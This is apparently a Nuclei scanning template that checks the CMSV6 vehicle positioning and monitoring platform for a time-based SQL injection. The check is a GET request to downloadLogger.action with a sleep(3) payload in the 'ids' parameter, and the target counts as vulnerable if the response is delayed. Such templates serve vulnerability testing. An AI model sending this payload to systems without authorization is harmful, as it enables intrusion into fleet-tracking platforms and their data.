
id: TTX-CMSV6-SQL

info:
  name: 通天星CMSV6车载定位监控平台 downloadLogger.action?ids接口处存在SQL注入漏洞。
  author: changge
  severity: high
  tags: HJSOFT
  description:
requests:
  - raw:
      - |
        GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(sleep(3)))tdpw)--+&loadAll=1&loadAll=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Length: 0

    matchers:
          - type: dsl
            dsl:
              - 'duration >= 3'
